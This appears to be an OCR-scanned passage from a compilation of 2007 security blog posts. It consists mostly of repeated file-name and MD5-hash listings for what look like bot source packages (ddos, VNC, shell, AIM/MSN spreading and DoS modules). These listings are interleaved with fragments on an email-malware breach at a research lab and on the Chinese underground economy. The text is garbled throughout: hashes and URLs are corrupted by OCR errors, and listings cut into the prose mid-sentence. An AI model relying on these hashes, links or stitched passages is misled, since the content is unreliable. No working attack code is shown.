66c4b044a018ee5189d58268b0ff2609 
Netapi.cpp 
f2b0a9490d4579ebalcObffdd06d02f0 
Netapi.h 14381a22f0b04e78d1513ebfbe76a805 
Sym.cpp 
664f810ffa736810660e302bc228956d 
Sym.h 
ab712d424efc398db3bbea274487c096 
vncshit.cpp 
fob601fcfd2ae1d134c0dd08387c05ad 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 
120.cpp 
4c08662bcd9176f79686fc3b818eabc8 
120.dsp 
e80f04071bbf7b693ae82d18dcf36449 
120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
120.h 
a15b6e3aec1615987ba6893bfcbc592f 
120.ico 
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clf0feb36e6cdfbf699525c72a683d0e 
120.ncb 
809eaeb2ca0162c7c431ce8ac87a7777 
120.opt 
d2c59bd9c0b38c4b5ea985f3205d0ea5 
120.plg 
3f9887a434ac0f25335cf70013e2ab68 
120.rc 
676eebd28fd44cde86c701857ed50769 
Adv.cpp 
6b13b5cd51e4932ba8b28d28264e8403 
Adv.h 
287bdeel2a102aeb33d79067c7e328c0 
CleanUp.bat 
d1db23a544ee2f7bca4adc252dae33bf 
Cmd.h 
bed30feedeadd8aa2ffae2blcfb7216a 
Conf.h 
b331b158c3e441753808932357f19e08 
Crc.cpp 
f8f8f36234f11fc2148fbb06912ca454 
Crc.h 
fee33b0009142a39a062c9ae2eddOfb8 
Cry.cpp 
93d8cc63fa24659a056d359c522c8153 
Cry.h 
68f4927efd75fc1314316ed63dec5a02 
d3des.c 
e€259805a2bae810b780140dd388c1191 
d3des.h 
35cd1a965963d32df92f8087ff642cd1 
ddos.cpp fd75afad4cd9722913611587510113f2 
ddos.h 
30a540317bf24202fb82408e4582200c 
Def.h 
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08d93c2991d4f38b9939e37c7bc1bf05 
encrypt.exe 
€20f3260419d966d4393fac3ab17654c 
Ext.h 
22b98e111f37fcdfb6d4eff4b320b2f1 
Fun.h 
21dd0ab1897cc4cdf6e36f7dad2f2fd3 
Glo.h 
c96e029def5b6dal17307d935dbeafeee 
Ide.cpp 
5af0e8856dd215c2d408a7b7e43a209c 
Ide.h 
8a2194a0b52d9c0588daebe50b72e7dc 
Inc.h 
4fcedff35c333ealcd1756de5c6589aa 
Ldll.cpp 95106b03308354203db7401c581277c3 
Ldll.h 
2d449d631flede65f6b35850404b6055 
Pas.h 
afb1899a0f767e90ff9bd22209ab0e66 
patcher.cpp 
Odf064223bcc9dc32dd8d7152c33871e 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
rfb.h 
04d6bd675ae235411f6f6a33a0e8e147 
Rnd.cpp 
27ef23d7d3b6e15eb6ccdd7674251ca8 
Rnd.h 
773602a01e847334df6100af4a26c3d4 
Shel.cpp 93287f9e08ee07d1bca553b541ff031e 
Shel.h 
bcfd1e03c33a67ddabc6f33el1a1b54a6 
Str.h 
a9c544a6ffc2c23a1b320ac9e1550200 
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Sys.cpp 
62c60d515cc93b1dcb490c57b5d06417 
Sys.h 
3230d67a188e32b6532cc9b22a3e99072 
Tcp.h 
5680e8e630e33ed8f84b552fa1ld14b87 
tcpip.h 
3464effd01374f2732b9c95252af9740 
Test.cpp 04bdc970cc63b08196baca3a/73faa2ce 
Test.h 
e996ba078dc4ae97483506f6d5aleabc 
Thr.cpp 
0b7714505d4e0fec91567189d9dd3fa9 
Thr.h 
8af946008d26ae434f0e9187d41a94c4 
ver.c 
96bc28bdb5f658224488715da4264095 
ver.h 
6620d6b2e364aa00c67d8f6ba2bd6872 
vncshit.cpp 
137aa43b7dc9270632e7cbfba430006e 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 
Asn.cpp 
9947a2456df330e3421a2f462378dfbb 
Asn.h 
c57e30fde41b1dfal1a159234e4e6475 
Netapi.cpp 
f2b0a9490d4579ebalcObffdd06d02f0 
Netapi.h 14381a22f0b04e78d1513ebfbe76a805 
Netbios.cpp 
132d4a6fd75c76f2bd6dab6c6b06566fd 
Netbios.h 
a54523937044e354c94fa932139b5cf9 


Pnp.cpp 
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0e8479818d8c01210368a3490c76dcd4 
Pnp.h 
5a320966fb8e40736cbe0b9a51b5c253 
Sym.cpp 
664f810ffa736810660e302bc228956d 
Sym.h 
ab712d424efc398db3bbea274487c096 
vncshit.cpp 
f6b601fcfd2ae1d134c0dd08387c05ad 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 
120.cpp 
4c08662bcd9176f79686fc3b818eabc8 
120.dsp 
9a099640c3e298c1f38196adedadcb4b 
120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
120.h 
al15b6e3aec1615987ba6893bfcbc592f 
120.ico 
clf0feb36e6cdfbf699525c72a683d0e 
120.ncb 
8b7b1e6a4d351e100f4542b6813d9829 
120.opt 
e€282c0b788cddebe166670bcccfadd3f 
120.plg 
2eaef1328a0e436da924040af23e64d3 
120.rc 
676eebd28fd44cde86c701857ed50769 
Adv.cpp 
c2d8d4227bb46dff245060afee013e9c 
Adv.h 
287bdeel2a102aeb33d79067c7e328c0 
CleanUp.bat 
d1db23a544ee2f7bca4adc252dae33bf 
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Cmd.h 
bed30feedeadd8aa2ffae2blcfb7216a 
Conf.h 
b331b158c3e441753808932357f19e08 
Crc.cpp 
f8f8f36234f11fc2148fbb06912ca454 
Crc.h 
fee33b0009142a39a062c9ae2eddOfb8 
Cry.cpp 
93d8cc63fa24659a056d359c522c8153 
Cry.h 
68f4927efd75fc1314316ed63dec5a02 
ddos.cpp fd75afad4cd9722913611587510113f2 
ddos.h 
30a540317bf24202fb82408e4582200c 
Def.h 
08d93c2991d4f38b9939e37c7bc1bf05 
encrypt.exe 
e€20f3260419d966d4393fac3ab17654c 
Ext.h 
22b98e111f37fcdfb6d4eff4b320b2f1 
Fun.h 
21dd0ab1897cc4cdf6e36f7dad2f2fd3 
Glo.h 
c96e029def5b6da17307d935dbeafeee 
Ide.cpp 
5af0e8856dd215c2d408a7b7e43a209c 
Ide.h 
8a2194a0b52d9c0588daebe50b72e7dc 
Inc.h 
d74cbb7cf8cdf9d015a5d7e256478d29 
Ldll.cpp 95106b03308354203db7401c581277c3 
Ldll.h 
2d449d631flede65f6b35850404b6055 


Pas.h 
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attachments. That allowed them to access a database containing the personal information of 
people who visited the lab over a 14-year period starting in 1990. The institution, which has 
a staff of about 3,800, conducts top-secret research that is used for homeland security and 
military purposes." 


And, of course, [12]there’s a Chinese connection, but thankfully there’re articles empha- 
sizing on the concept of [13]stepping-stones before reaching the final destination, with 
China’s highly malware infected Internet population acting as the stepping-stone, not the 
original source of the attack : 


"Security researchers said the memorandum, which was obtained by The New York Times 
from an executive at a private company, included a list of Web and Internet addresses that 
were linked to locations in China. However, they noted that such links did not prove that the 
Chinese government or Chinese citizens were involved in the attacks. In the past, intrud- 
ers have compromised computers in China and then used them to disguise their true location." 


[14]Publicly obtainable research, and common sense state that malware coming through 
email attachments is slowing down, and is actually supposed to be filtered on the gateway 
perimeter by default, especially executables. Even the [15]first round of Storm Worm malware 
in January, 2007, concluded that email attachments are not longer as effective as they used 
to be, and therefore migrated to spamming malware embedded links [16]Jexploiting outdated 
vulnerabilities. 


How such type of targeted malware attack could have been prevented? 


- ensure that the emails are harvested much harder than they are for the time being, in 
this particular case, a huge percentage of the emails account, thus the future contact points 
for the malicious parties to take advantage of ornl.gov can be harvested without even bother- 
ing to crawl the domain itself through web scrapping ornl.gov 


- a freely avaivable, but [17]highly effective tool to evaluate whether or not your mail 
server filtering capabilities for such type of content work, is [18]PIRANA - Email Content Filters 
Exploitation Framework : 


"PIRANA is an exploitation framework that tests the security of a email content filter. 
By means of a vulnerability database, the content filter to be tested will be bombarded by 
various emails containing a malicious payload intended to compromise the computing plat- 
form. PIRANA’s goal is to test whether or not any vulnerability exists on the content filtering 
platform. This tool uses the excellent shellcode generator from the Metasploit framework!" 


Taking the second possible scenario, namely that it wasn’t a targeted attack, but mal- 
ware attachments "as usual", mostly because the fact that [19]modern malware automatically 
excludes mailings to .gov’s .mil’s and the majority of known to them anti-virus vendor’s related 
email addresses, hoping to infect as much people as possible before a reactive response is in 
place. 


If it were a spammed malware embedded link, the chances are the receipts followed it, 


but a spammed malware as an attachment is too Web 1.0 for someone to fall victim into, and 
it’s rocket scientists we’re talking about anyway. 


1220 


afb1899a0f767e90ff9bd22209ab0e66 
patcher.cpp 
Odf064223bcc9dc32dd8d7152c33871e 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
Rnd.cpp 
27ef23d7d3b6e15eb6ccdd7674251ca8 
Rnd.h 
773602a01e847334df6100af4a26c3d4 
Shel.cpp 93287f9e08ee07d1bca553b541ff031e 
Shel.h 
bcfd1e03c33a67ddabc6f33el1al1b54a6 
Str.h 
a9c544a6ffc2c23a1b320ac9e1550200 
Sys.cpp 
62c60d515cc93b1dcb490c57b5d06417 
Sys.h 
3230d67a188e32b532cc9b22a3e99072 
Tcp.h 
5680e8e630e33ed8f84b552fald14b87 
tcpip.h 
3464effd01374f2732b9c95252af9740 
Test.cpp 04bdc970cc63b08196baca3a73faa2ce 
Test.h 
e996ba078dc4ae97483506f6d5aleabc 
Thr.cpp 
0b7714505d4e0fec91567189d9dd3fa9 
Thr.h 
8af946008d26ae434f0e9187d41a94c4 
ver.c 
96bc28bdb5f658224488715da4264095 
ver.h 
6620d6b2e364aa00c67d8f6ba2bd6872 
Asn.cpp 
9947a2456df330e3421a2f462378dfbb 
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Asn.h 
c57e30fde41b1dfal1a159234e4e6475 
Netapi.cpp 
f2b0a9490d4579ebalcObffdd06d02f0 
Netapi.h 14381a22f0b04e78d1513ebfbe76a805 
Netbios.cpp 
132d4a6fd75c76f2bd6dab6c6b06566fd 
Netbios.h 
a54523937044e354c94fa932139b5cf9 
Pnp.cpp 
0e8479818d8c01210368a3490c76dcd4 
Pnp.h 
5a320966fb8e40736cbe0b9a51b5c253 
Sym.cpp 
664f810ffa736810660e302bc228956d 
Sym.h 
ab712d424efc398db3bbea274487c096 
Vinc.cpp 
013428cc3743c2c7874c6c099657eecc 
vnc.h 
091d289ad5beebf2b717054dc8dea837 
120.cpp 
4c08662bcd9176f79686fc3b818eabc8 
120.dsp 
4c5c290a9fbb600baecc354d99430309 
120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
120.h 
a15b6e3aec1615987ba6893bfcbc592f 
120.ico 
clf0feb36e6cdfbf699525c72a683d0e 
120.ncb 
fc809a0e29cdbalae24c62fa9labbaab 
120.opt 
9a81d9db09815948aff21318cc321745 
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120.plg 
261f08ee576d3877a9306164b7bf1831 
120.rc 
676eebd28fd44cde86c701857ed50769 
Adv.cpp 
f9f8d83889ea9cdb69a30fba5c8af40e3 
Adv.h 
287bdeel2a102aeb33d79067c7e328c0 
CleanUp.bat 
d1db23a544ee2f7bca4adc252dae33bf 
Cmd.h 
bed30feedeadd8aa2ffae2b1cfb7216a 
Conf.h 
bfecea4eedbe6ce4038c9d56a722d993 
Crc.cpp 
f8f8f36234f11fc2148fbb06912ca454 
Crc.h 
fee33b0009142a39a062c9ae2eddO0fb8 
Cry.cpp 
93d8cc63fa24659a056d359c522c8153 
Cry.h 
68f4927efd75fc1314316ed63dec5a02 
d3des.c 
e€259805a2bae810b780140dd388c1191 
d3des.h 
35cd1a965963d32df92f8087ff642cd1 


ddos.cpp fd75afad4cd9722913611587510113f2 


ddos.h 
30a540317bf24202fb82408e4582200c 
Def.h 
46df488cel2ea75dfaaae685fae271df 
encrypt.exe 
e20f3260419d966d4393fac3ab17654c 
Ext.h 
22b98e111f37fcdfb6d4eff4b320b2f1 
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Fun.h 
21dd0ab1897cc4cdf6e36f7dad2f2fd3 
Glo.h 
c96e029def5b6da17307d935dbeafeee 
Ide.cpp 
5af0e8856dd215c2d408a7b7e43a209c 
Ide.h 
8a2194a0b52d9c0588daebe50b72e7dc 
Inc.h 
3719bbe775cbf421fb475ca5a92ea57a 
Ldll.cpp 95106b03308354203db7401c581277c3 
Ldll.h 
2d449d631flede65f6b35850404b6055 
patcher.cpp 
Odf064223bcc9dc32dd8d7152c33871e 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
rfb.h 
04d6bd675ae235411f6f6a33a0e8e147 
Rnd.cpp 
27ef23d7d3b6e15eb6ccdd7674251ca8 
Rnd.h 
773602a01e847334df6100af4a26c3d4 
Shel.cpp 93287f9e08ee07d1bca553b541ff031e 
Shel.h 
bcfd1e03c33a67ddabc6f33el1a1b54a6 
Str.h 
a9c544a6ffc2c23a1b320ac9e1550200 
Sys.cpp 
62c60d515cc93b1dcb490c57b5d06417 
Sys.h 
3230d67a188e32b6532cc9b22a3e99072 
Tcp.h 
5680e8e630e33ed8f84b552fa1ld14b87 
tcpip.h 
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3464effd01374f2732b9c95252af9740 
Test.cpp 04bdc970cc63b08196baca3a73faa2ce 


Test.h 
e996ba078dc4ae97483506f6d5aleabc 
Thr.cpp 
0b7714505d4e0fec91567189d9dd3fa9 
Thr.h 
8af946008d26ae434f0e9187d41a94c4 
ver.c 
96bc28bdb5f658224488715da4264095 
ver.h 
6620d6b2e364aa00c67d8f6ba2bd6872 
vncshit.cpp 
2e€44602244211727280c60342bb0523d 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 
120.exe 
4f6ce92274471a4c79dbcf30f44844f5 
120.o0bj 

935ef719f61c0b647f7fff5 1la8aee940 
120.pch 
a30be48f258f9062175c0f49b9F7 70db 
Adv.obj 
3f5dee468449211bc820966673bdd3e2 
Crc.obj 
00d98c2243560f78bb85f170c372401f 
Cry.obj 
e7ffb8782d4eb2ea63cb8943bd4237e1 
d3des.obj 
77802509e01dce94ad970368846756a8 
Ide.obj 


893f13cbc7e9963 1laacbdbf8864f2fec 
Ldll.obj 1bd38c6cca9900ff8ac43f0ef995e845 
mohaa.obj 
ced240e42daae27cfe56c340c0438868 
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Netapi.obj 
5696b930323a028097c6535b5d34b850 
patcher.obj 
ae5a334fa356d630b1d28ef9f3260420 
Rnd.obj 
428a5b96136ddd5e474eb71bb0dd5913 
Shel.obj 3be8e7527982c920581lee0cdd4b692a0 
Sym.obj 
ccd061d06e3cdc4b965db13771da1301 
Sys.obj 
163a61196ac81b362be32ee5fcb92236 
Test.obj Oaff6b8801ffob431b4c1b42d441737e 
Thr.obj 

37¢€2373550fbc54a3a6fd53f8c3d0a4f 
vc60.idb 5a590a6910ab315f8alfae497eel1ce08 
ver.obj 

fal4b2c327161f3b12e9cb585aaa55d7 
vncshit.obj 
04b85956061a16f8d984527eea70d20e 
mohaa.cpp 
03af4f61256904e5036b203cf9f7d6c2 

mohaa.h 
82fe6def882b9b8748313aa0d472a604 
Netapi.cpp 
f2b0a9490d4579ebalcObffdd06d02f0 
Netapi.h 14381a22f0b04e78d1513ebfbe76a805 
Sym.cpp 
664f810ffa736810660e302bc228956d 

Sym.h 

ab712d424efc398db3bbea274487c096 
vncshit.cpp 
f6b601fcfd2ae1d134c0dd08387c05ad 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 


120.cpp 
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4c08662bcd9176f79686fc3b818eabc8 
120.dsp 
189b3312b2099c824422ddfd90ee72b3 
120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
120.h 
al15b6e3aec1615987ba6893bfcbc592f 
120.ico 
clf0feb36e6cdfbf699525c72a683d0e 
120.ncb 
5aafee4602eff27dc8c0c7dd2e0688cf 
120.opt 
7851b70e7302ca03c1le3e4631fdd34ca 
120.plg 
ccf5939552733b0falba8bd83c32d7cl 
120.rc 
676eebd28fd44cde86c701857ed50769 
Adv.cpp 
4ee29a022eec1ce66785d02706970c14 
Adv.h 
287bdeel2a102aeb33d79067c7e328c0 
CleanUp.bat 
d1db23a544ee2f7bca4adc252dae33bf 
Cmd.h 
bed30feedeadd8aa2ffae2b1cfb7216a 
Conf.h 
b331b158c3e441753808932357f19e08 
Crc.cpp 
f8f8f36234f11fc2148fbb06912ca454 
Crc.h 
fee33b0009142a39a062c9ae2eddO0fb8 
Cry.cpp 
93d8cc63fa24659a056d359c522c8153 
Cry.h 
68f4927efd75fc1314316ed63dec5a02 
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d3des.c 
€259805a2bae810b780140dd388c1191 
d3des.h 
35cd1a965963d32df92f8087ff642cd1 
ddos.cpp fd75afad4cd9722913611587510113f2 
ddos.h 
30a540317bf24202fb82408e4582200c 
Def.h 
08d93c2991d4f38b9939e37c7bc1bf05 
encrypt.exe 
e€20f3260419d966d4393fac3ab17654c 
Ext.h 
22b98e111f37fcdfb6d4eff4b320b2f1 
Fun.h 
21dd0ab1897cc4cdf6e36f7dad2f2fd3 
Glo.h 
c96e029def5b6dal17307d935dbeafeee 
Ide.cpp 
5af0e8856dd215c2d408a7b7e43a209c 
Ide.h 
8a2194a0b52d9c0588daebe50b72e7dc 
Inc.h 
1ca573c962173e4fd3dc73d53f0ddf8e 
Ldll.cpp 95106b03308354203db7401c581277c3 
Ldll.h 
2d449d631flede65f6b35850404b6055 
Pas.h 
afb1899a0f767e90ff9bd22209ab0e66 
patcher.cpp 
Odf064223bcc9dc32dd8d7152c33871e 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
rfb.h 
04d6bd675ae235411f6f6a33a0e8e147 


Rnd.cpp 
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27ef23d7d3b6e15eb6ccdd7674251ca8 
Rnd.h 
773602a01e847334df6100af4a26c3d4 
Shel.cpp 93287f9e08ee07d1bca553b541ff031e 
Shel.h 
bcfd1e03c33a67ddabc6f33e1al1b54a6 
Str.h 
a9c544a6ffc2c23a1b320ac9e1550200 
Sys.cpp 
62c60d515cc93b1dcb490c57b5d06417 
Sys.h 
3230d67a188e32b532cc9b22a3e99072 
Tcp.h 
5680e8e630e33ed8f84b552fald14b87 
tcpip.h 
3464effd01374f2732b9c95252af9740 
Test.cpp 04bdc970cc63b08196baca3a73faa2ce 
Test.h 
e996ba078dc4ae97483506f6d5aleabc 
Thr.cpp 
0b7714505d4e0fec91567189d9dd3fa9 
Thr.h 
8af946008d26ae434f0e9187d41a94c4 
ver.c 
96bc28bdb5f658224488715da4264095 
ver.h 
6620d6b2e364aa00c67d8f6ba2bd6872 
vncshit.cpp 
2e€44602244211727280c60342bb0523d 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 
Asn.cpp 
9947a2456df330e3421a2f462378dfbb 
Asn.h 
c57e30fde41b1dfal1a159234e4e6475 
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mohaa.cpp 
03af4f61256904e5036b203cf9F7d6c2 
mohaa.h 
82fe6def882b9b8748313aa0d472a604 
Netapi.cpp 
f2b0a9490d4579ebalcObffdd06d02f0 
Netapi.h 14381a22f0b04e78d1513ebfbe76a805 
Netbios.cpp 
132d4a6fd75c76f2bd6dab6c6b06566fd 
Netbios.h 
a54523937044e354c94fa932139b5cf9 
Pnp.cpp 
0e8479818d8c01210368a3490c76dcd4 
Pnp.h 
5a320966fb8e40736cbe0b9a51b5c253 
Sym.cpp 
664f810ffa736810660e302bc228956d 
Sym.h 
ab712d424efc398db3bbea274487c096 
vncshit.cpp 
fob601fcfd2ae1d134c0dd08387c05ad 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 
120.cpp 
4c08662bcd9176f79686fc3b818eabc8 
120.dsp 
e80f04071bbf7b693ae82d18dcf36449 
120.dsw 
ac5b003d9f3b7b3f613652b01e1c1454 
120.h 
a15b6e3aec1615987ba6893bfcbc592f 
120.ico 
clf0feb36e6cdfbf699525c72a683d0e 
120.ncb 
71557201103e75f4c0767d5dffb939b7 
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ttp://www.windowsecurity.com/articles/Popular-Spammers-Strategies-Tactics.htm 


ttp://ddanchev.blogspot.com/2007/01/inside-email-harvesters-configuration.htm 


ttp://ddanchev.blogspot.com/2007/10/fast-flux-spam-and-scams- increasing. html 


ttp://ddanchev. blogspot .com/2007/02/phishing- ecosystem. htm 


ttp://www.informationweek.com/news/showArticle. jhtml?articleID=20260307 


OS oN 


ttp://computerworld.com/action/article.do?command=viewArticleBasicktaxonomyName=security&articleId=9044 
7. hep: //www. wired. con/politics/security/news/2007/09/ptizerspad 
tp ister.c al_labs_ 
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_ het: //Adanchev blogspot .cok/2007/00/chinas~cyber~espionage- ambitions. heal 
_ http: //adanchev blogspot .con/2007/01/social-engineering-and-nalare. nia 

_hetp:/ /adanchev blogspot. con/2007/12/udac-activer~code~ execution- exploit eal 
| fctp:/ eww. guay-Lerous. cou/projecte/pirans-0.3.5.tar.a5 


ttp://www.guay-leroux.com/projects.htm 


9. http: //ddanchev.blogspot .com/2007/11/targeted-spamming-of-bankers-malware .htm 
10. http://ddanchev. blogspot .com/2007/10/dynamics-of-malware-industry.htm 
ttp://ddanchev. blogspot .com/2007/03/underground-economys- supply-of- goods. htm 


ttp://www.nytimes.com/2007/12/09/us/nationalspecial3/09hack.html?ref=technolog 


ttp://www.wired. itics/security/news/2007/0 izerspam 
8. http://www.thereg o.uk/2007/12/07/national_1 breached/ 


ttp://ddanchev. blogspot .com/2007/01/inside-email-harvesters-configuration.htm 


3.12.6 Inside the Chinese Underground Economy (2007-12-10 05:29) 


CHINREARGLE.ORG 


Here’s a [1]very detailed, and [2]recently released event-study on [3]Malicious Websites and 
Underground Economy on the Chinese Web, and this is how they assessed the high activity at 
the underground related forums : 


"Unlike the US or EU blackhats communities, Chinese blackhats are typically not familiar 
with IRC (In-ternet Relay Chat). They typically use bulletin board systems on the Web or IM 
software like QQ tocommunicate with each other. Orthogonal to a study on the underground 
black market located within IRC networks, we measure the Chinese-specific underground 
black market on the Web. We focus onthe most important part located at post.baidu.com, the 
largest bulletin board community in China. We crawled the portal and stored all posts and 
replies posted on some certain post bars which are all dedicated for the underground black 
market on this particular website. The post bars we examined include Traffic bar, Trojans bar, 
Web-based Trojans bar, Wangma bar (acronyms of Web-based Trojans inChinese), Box bar, 
Huigezi bar, Trojanized websites bar, and Envelopes bar." 


What’s the big picture on the Chinese IT Underground anyway? It’s a very curious per- 
spective next to China’s economy self-awareness from a supplier of the parts that make up 
the products, to the independent manufacturer of them in real life. In cyberspace, the people 
driving the Chinese Underground tend to borrow malicious know-how from their Russian 


1221 


120.opt 
60570c27c0f85a90d94ff7dcd08fbleb 
120.plg 
1418c3729cb95ce5717992fede8e4bc1 
120.rc 
676eebd28fd44cde86c701857ed50769 
Adv.cpp 
6b13b5cd51e4932ba8b28d28264e8403 
Adv.h 
287bdeel2a102aeb33d79067c7e328c0 
CleanUp.bat 
d1db23a544ee2f7bca4adc252dae33bf 
Cmd.h 
bed30feedeadd8aaz2ffae2b1cfb7216a 
Conf.h 
b331b158c3e441753808932357f19e08 
Crc.cpp 
f8f8f36234f11fc2148fbb06912ca454 
Crc.h 
fee33b0009142a39a062c9ae2eddO0fb8 
Cry.cpp 
93d8cc63fa24659a056d359c522c8153 
Cry.h 
68f4927efd75fc1314316ed63dec5a02 
d3des.c 
€259805a2bae810b780140dd388c1191 
d3des.h 
35cd1a965963d32df92f8087ff642cd1 
ddos.cpp fd75afad4cd9722913611587510113f2 
ddos.h 
30a540317bf24202fb82408e4582200c 
Def.h 
08d93c2991d4f38b9939e37c7bc1bf05 
encrypt.exe 
€20f3260419d966d4393fac3ab17654c 
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Ext.h 
22b98e111f37fcdfb6d4eff4b320b2f1 
Fun.h 
21dd0ab1897cc4cdf6e36f7dad2f2fd3 
Glo.h 
c96e029def5b6da17307d935dbeafeee 
Ide.cpp 
5af0e8856dd215c2d408a7b7e43a209c 
Ide.h 
8a2194a0b52d9c0588daebe50b72e7dc 
Inc.h 
4fcedff35c333ealcd1756de5c6589aa 
Ldll.cpp 95106b03308354203db7401c581277c3 
Ldll.h 
2d449d631flede65f6b35850404b6055 
Pas.h 
afb1899a0f767e90ff9bd22209ab0e66 
patcher.cpp 
Odf064223bcc9dc32dd8d7152c33871e 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
rfb.h 
04d6bd675ae235411f6f6a33a0e8e147 
Rnd.cpp 
27ef23d7d3b6e15eb6ccdd7674251ca8 
Rnd.h 
773602a01e847334df6100af4a26c3d4 
Shel.cpp 93287f9e08ee07d1bca553b541ff031e 
Shel.h 
bcfd1e03c33a67ddabc6f33el1a1b54a6 
Str.h 
a9c544a6ffc2c23a1b320ac9e1550200 
Sys.cpp 
62c60d515cc93b1dcb490c57b5d06417 
Sys.h 
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3230d67a188e32b532cc9b22a3e99072 
Tcp.h 
5680e8e630e33ed8f84b552fald14b87 
tcpip.h 
3464effd01374f2732b9c95252af9740 
Test.cpp 04bdc970cc63b08196baca3a73faa2ce 
Test.h 
e996ba078dc4ae97483506f6d5aleabc 
Thr.cpp 
0b7714505d4e0fec91567189d9dd3fa9 
Thr.h 
8af946008d26ae434f0e9187d41a94c4 
ver.c 
96bc28bdb5f658224488715da4264095 
ver.h 
6620d6b2e364aa00c67d8f6ba2bd6872 
vncshit.cpp 
2e€44602244211727280c60342bb0523d 
vncshit.h 
€88a41f3eb5a443633e233221b6d30a4 
Asn.cpp 
9947a2456df330e3421a2f462378dfbb 
Asn.h 
c57e30fde41b1dfal1a159234e4e6475 
Netapi.cpp 
f2b0a9490d4579ebalcObffdd06d02f0 
Netapi.h 14381a22f0b04e78d1513ebfbe76a805 
Netbios.cpp 
132d4a6fd75c76f2bd6da6c6b06566fd 
Netbios.h 
a54523937044e354c94fa932139b5cf9 
Pnp.cpp 
0e8479818d8c01210368a3490c76dcd4 
Pnp.h 
5a320966fb8e40736cbe0b9a51b5c253 
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Sym.cpp 
664f810ffa736810660e302bc228956d 
Sym.h 
ab712d424efc398db3bbea274487c096 
vncshit.cpp 
f6ob601fcfd2ae1d134c0dd08387c05ad 
vncshit.h 
e88a41f3eb5a443633e233221b6d30a4 
clsCPUID.cls 
60200c46b76ee0fa516c17a09844c380 
clsExitWindows.cls 
d85f5b4daa417458b0d1e94c8d21f8c2 
clsSocketPlus.cls 
e64e12fc572c6974266761875ff79a14 
clsStringBuilder.cls 
34afceccle14b886cc594aac360b979c 
ctIDownload.ctl 
0289aa4be496184d0519c236397d941e 
ctlSocks4.ctl 
f52bd580e90d6ala4e4c515cd2e954ca 
exclude modules.txt 
529fc4b599619f6dc55997fffedlecO5 
frmMain.frm 
ccc3a49ddf595f13da419320066517e6 
hosts.txt 
93b47c009f98fe81965124cd0bdf97F4 
kill lists.enc 
7a12f57c04265f2fb2d200327466ab07 
modAccessibility.bas 
6lefeafod9felced693d97c9f8272fba 
modCommands.bas 
7ed3ef2c1605b0d4d7c8a577b117bccc 
modCPUSpeed.bas 
5b31c1e1f8286238bec098ec363c551¢c 
modCRC32.bas 
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al8e6ca631fcd9f163b0ca7d4e6e837b 
modData.bas 
f42228f76056694f3c6755e17a0d3376 
modDNS.bas 
bf17837flac51745c69e772dfbelceb4 
modDoS.bas 
641716e34c3413eb32759f9cb2c66fb6 
modDOSOutput.bas 
19e900652b4dal190cf45a4b1cd7df6d7 
modEncrypt.bas 
4838a3571e0d15d4dfbe9d360ff452ce 
modFileSearch.bas 
127ea101c475f6a7c190388e3d8bclcf 
modHomepage.bas 
a6b44a717921daead7e5f008b3d98fle 
modkillProc.bas 
864a5441526166c95d33fb99c5d6ac83 
modkKillStuff.bas 
dOff157cal28e244cd7494d2cad8e26d 
modMain.bas 
ce72b6689aa535f2a858f2644684400f 
modMD5.bas 
289c8ccca75cb031931ce7b5861cc582 
modMutex.bas 
b751fe5044d63b9856d08eb17ac570a0 
modPatchTCPIP.bas 
d868bc0a8c035bc5d852655615ce0e03 
modRegistry.bas 
d45b54426de95c4e2f4eeedf68dal1753 
modSettings.bas 
0a7973ef55b5b25e52e7e7a5c5de73ea 
modShellExec.bas 
€595e433ecbe9b13874863212e23b88a 
modSocketPlus.bas 
ef9b91d4b3105fa6a0f75119f4469020 
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modSpreadAIM.bas 
€24b6047472b4d4228984b008441fed8 
modSpreadMSN.bas 
340f6f42b644b56b7688de645d98397b 
modStartup.bas 
996104667c5506e29c85bf16c484a409 
modSyslInfo.bas 
98f92490dd02a0318d89d7d6965fc648 
pstord.enc 
41551e2588d404b9a5b755a8a432d0bf 
pstord.exe 
5498c04e8d0edc847f2b1f1l5debf7309 
README.txt 
Adcfbe298eab652db8dacbb0f51c3e293 
resources.rc 
515c2b54feac275799abc3bcf6f2281b 
resources.RES 
06120f2d0d09a216d6f987de0628dc01 
SpazBot.vbp 
ffab93d878bd8435c5bf54238b355195 
Adv.cpp 
388692fdc91b2bel12cdefcfla22215d6 
Adv.h 
091c977c9f0859a2b4216da43ce6e272 
CleanUp.bat 
8206bb40d0fe345bc3b28fb5d9d8daal 
Cmd.h 
978367bebcfb2af29ed743dc70bb24e1 
Conf.h 
c1f04f19d2a4659a5e35dblafee91cfd 
Crc.cpp 
2e7bcf370a6dd73764044f99bfbe4d55 
Crc.h 
7209347af1068873d2c115cc766e46e6 


Cry.cpp 
12188 


c517510c0f6617b4b465910477331f99 

Cry.h 

ac14516b33fd737d31f0c94056b10355 
ddos.cpp 4da4d54ca4d985d7f27a3cde1e134629 
Def.h 

26f8edleac2d6a261d1ffe7e77a7a6c4 

Ext.h 

3eee49035daf7c6b9cbe18790db683cc 

Fun.h 

35107d56283dd3b208bae76104a5b012 

Glo.h 

41c6662ef3fedb354be658ae52d7c682 

Ide.cpp 
€9081560959d7f4cc496c032453b62e7 

Ide.h 

c73ec1454f2e67577989e993dde0fba8 

Inc.h 

f8b0c57c27b29fffbca32142c05a3b34 

Ldll.cpp e6a8328d69bcdcea437442802 7aebbff 
Ldll.h 

df2cc955b538e26588991bba0752547d 

Nic.h 

b514dc7e81ea155071878110fe3fc2ab 

Pas.h 

297a3e064a71fe3c0933bfc1lc54d6cla 
resource.h 
3b012e93f8f23a8e82b7f152b6fbfb45 

Rnd.cpp 

b1e03a09874df2d175cefbf7d77d99fc 

Rnd.h 

6a4b6525d9e6bcbhcfa89949bde53daf7 
Shel.cpp O090f5b8dc9e691a3a3ac733a3caf7100 
Shel.h 

